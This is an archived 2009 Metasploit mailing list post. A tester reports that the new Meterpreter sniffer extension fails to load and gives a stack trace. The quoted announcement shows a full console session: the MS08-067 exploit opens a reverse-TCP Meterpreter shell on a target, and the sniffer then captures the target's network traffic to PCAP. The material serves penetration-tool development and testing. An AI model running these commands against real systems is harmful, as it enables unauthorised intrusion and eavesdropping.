Metasploit mailing list archives
Meterpreter Sniffer module
From: xyberpix at xyberpix.com (xyberpix)
Date: Sat, 11 Jul 2009 15:51:01 +0100
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hey HD, Just did a quick test, and it barfed on me, dunno though whether this is the code, or my setup. Running on OS X 10.5.7, with Mac Port installed. meterpreter > use sniffer Loading extension sniffer...[-] failure: No response was received to the core_loadlib request. /Users/ xyberpix/Tools/svn/trunk/lib/rex/post/meterpreter/client_core.rb: 157:in `use' /Users/xyberpix/Tools/svn/trunk/lib/rex/post/meterpreter/ui/console/ command_dispatcher/core.rb:266:in `cmd_use' /Users/xyberpix/Tools/svn/trunk/lib/rex/post/meterpreter/ui/console/ command_dispatcher/core.rb:254:in `each' /Users/xyberpix/Tools/svn/trunk/lib/rex/post/meterpreter/ui/console/ command_dispatcher/core.rb:254:in `cmd_use' /Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb: 234:in `send' /Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb: 234:in `run_command' /Users/xyberpix/Tools/svn/trunk/lib/rex/post/meterpreter/ui/console.rb: 94:in `run_command' /Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb: 196:in `run_single' /Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb: 191:in `each' /Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb: 191:in `run_single' /Users/xyberpix/Tools/svn/trunk/lib/rex/post/meterpreter/ui/console.rb: 60:in `interact' /Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/shell.rb:123:in `call' /Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/shell.rb:123:in `run' /Users/xyberpix/Tools/svn/trunk/lib/rex/post/meterpreter/ui/console.rb: 58:in `interact' /Users/xyberpix/Tools/svn/trunk/lib/msf/base/sessions/meterpreter.rb: 181:in `_interact' /Users/xyberpix/Tools/svn/trunk/lib/rex/ui/interactive.rb:48:in `interact' /Users/xyberpix/Tools/svn/trunk/lib/msf/ui/console/command_dispatcher/ core.rb:997:in `cmd_sessions' /Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb: 234:in `send' /Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb: 234:in `run_command' /Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb: 196:in `run_single' /Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb: 191:in `each' /Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/dispatcher_shell.rb: 191:in `run_single' /Users/xyberpix/Tools/svn/trunk/lib/rex/ui/text/shell.rb:127:in `run' ./msfconsole:82 meterpreter > xyberpix On 11 Jul 2009, at 15:38, HD Moore wrote:
I committed a test version of the sniffer extension to the SVN trunk. The module in SVN is compiled with debug support, so you should see lots of verbose debug prints if you attach a debugger to the process where meterpreter is running. I could use some help testing this new extension; so far it looks like there are some cases where the "use sniffer" command fails (exploiting ms03-026 on win2003 sp0), but there may be others as well. To obtain the latest version of Metasploit on UNIX platforms: $ svn co https://metasploit.com/svn/framework3/trunk/ To obtain the latest version of Metasploit on Windows: 1. Download https://metasploit.com/framework-3.3-dev.exe 2. Execute this and extract the framework to a directory 3. Inside the extracted directory execute msfupdate.bat 4. Inside the extracted directory execute msfconsole.bat This module uses the MicroOLAP (commercial) Packet Sniffer SDK (we have a license), it can sniff packets from the target system without writing to the filesystem or installing any drivers. The module automatically excludes its own control traffic from the packet capture. As of this week, all Meterpeter communication is now protected by TLS/SSL, including the packet sniffer data. To get started with the new module: msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpeter/ reverse_tcp msf exploit(ms08_067_netapi) > set LHOST 192.168.0.139 msf exploit(ms08_067_netapi) > set RHOST 192.168.0.120 msf exploit(ms08_067_netapi) > exploit [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Triggering the vulnerability... [*] Transmitting intermediate stager for over-sized stage...(216 bytes) [*] Sending stage (205824 bytes) [*] Meterpreter session 1 opened (192.168.0.139:4444 -> 192.168.0.120:1687) meterpreter > use sniffer Loading extension sniffer...success. meterpreter > help [snip] Sniffer Commands ================ Command Description ------- ----------- sniffer_dump Retrieve captured packet data sniffer_interfaces List all remote sniffable interfaces sniffer_start Capture packets on a previously opened interface sniffer_stats View statistics of an active capture sniffer_stop Stop packet captures on the specified interface meterpreter > sniffer_interfaces 1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:true wifi:false ) meterpreter > sniffer_start 1 [*] Capture started on interface 1 (200000 packet buffer) meterpreter > sniffer_dump 1 /tmp/all.cap [*] Dumping packets from interface 1... [*] Wrote 6 packets to PCAP file /tmp/all.cap meterpreter > sniffer_dump 1 /tmp/all.cap [*] Dumping packets from interface 1... [*] Wrote 31 packets to PCAP file /tmp/all.cap The sniffer_dump command will append to an existing PCAP or create a new one. -HD _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (Darwin) iEYEARECAAYFAkpYptUACgkQ0IPlrIA4qxpfUwCaAiLcu+nmcRSH3CT1wkHtdxE3 YzoAn3WFO5UJTcrejiIsoPswYTadzigN =beiw -----END PGP SIGNATURE-----
Current thread:
- Meterpreter Sniffer module HD Moore (Jul 11)
- Meterpreter Sniffer module xyberpix (Jul 11)
- Meterpreter Sniffer module HD Moore (Jul 11)
- Meterpreter Sniffer module xyberpix (Jul 11)
- Meterpreter Sniffer module HD Moore (Jul 11)
- Meterpreter Sniffer module HD Moore (Jul 11)
- Meterpreter Sniffer module Carlos Perez (Jul 11)
- Meterpreter Sniffer module xyberpix (Jul 11)
- Meterpreter Sniffer module Carlos Perez (Jul 11)
- Meterpreter Sniffer module xyberpix (Jul 11)
- Meterpreter Sniffer module HD Moore (Jul 11)
- Meterpreter Sniffer module xyberpix (Jul 12)
- Meterpreter Sniffer module jep (Jul 13)
- Meterpreter Sniffer module HD Moore (Jul 13)